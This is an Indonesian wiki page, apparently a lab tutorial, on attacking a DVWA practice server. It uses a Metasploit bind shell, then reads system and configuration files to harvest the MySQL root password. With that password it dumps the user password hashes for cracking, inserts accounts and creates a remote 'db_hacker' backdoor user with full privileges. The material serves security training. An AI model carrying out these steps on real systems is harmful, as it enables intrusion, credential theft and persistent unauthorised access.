DVWA: Serangan Menggunakan Metasploit

From OnnoWiki
Revision as of 04:47, 15 November 2014 by Onnowpurbo (talk | contribs) (New page: * Gunakan Backtrack / Kali Linux. * Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole. use multi/handler set PAYL...)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search
  • Gunakan Backtrack / Kali Linux.
  • Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.


use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.80
   192.168.0.80 is the IP Address of the Fedora Server running DVWA.
   To obtain this IP Address, see Section 3, Step 3.
exploit


whoami
   This command prints the username for the effective userid.
   If the username was root, then we would be in full control; however, the username is apache.
grep apache /etc/passwd
   Here I am checking if the username is allowed to login remotely.
   When a shell is set to /sbin/nologin, then that user cannot login remotely.
   
grep apache /etc/group
   It is important to discover other additional groups that apache might belong to.
   In this case, apache is pretty well protected.



ps -eaf | grep http
    Typically, the Apache web server processes will run with a daemon called httpd.
pwd
    Print the current working directory.
    This actually tells us a lot.  It tell us the exact path of where the NetCat command was executed from in Section 6, Step 2.
ls -ld /var/www/html
    In Fedora, the "DocumentRoot" path is typically /var/www/html.
    If this directory was owned by apache instead of root we could do some web graffiti and many other things.
ls -ld /var/www/html/dvwa
    The parent directory for the DVWA is /var/www/html/dvwa.
    Unfortunately, the apache username only has world read and execute permissions.
ls -l /var/www/html/dvwa
    Now we are going to explore the contents of the DVWA directory.
    Notice, there is a config directory.
    Config directories are important because they contain database credential information.


ls -l /var/www/html/dvwa/config
    We are shown there is a configuration file with a permission problem.
    The config.inc.php problem is that its' permissions are set to 644, meaning that anyone can read this file.
cat /var/www/html/dvwa/config/config.inc.php
    Bingo!!!
    For the database name dvwa, the user is root and the password is dvwaPASSWORD.


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
    Show all databases in mysql.
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
    Show all tables in the dvwa database.
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
    Describe the fields of the dvwa.users table.
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
    Print the contents of the dvwa.users table.
    Notice the password field is displayed, where you can use tools like John the Ripper to crack it.


echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
     This create a new username in the dvwa.users tables.
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
     Notice there is now a new record #6.
     If you wanted to create an additional user, the next available user_id would incremental to #7 and so on.


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
      Shows all the databases on the machine.
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD


echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
     This created a new user named db_hacker with a password of abc123 that can login from anywhere with connectivity.
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
       Notice the very last newly created entry.



mysql -u db_hacker -h 192.168.0.80 -p
     Replace 192.168.0.80 with the Fedora IP Address obtained (Section 3, Step 3)
     The db_hacker password is "abc123" or whatever you set it too.
show databases;
quit
date
echo "Your Name"
       Replace the string "Your Name" with your actual name.
       E.g., echo "John Gray"


Referensi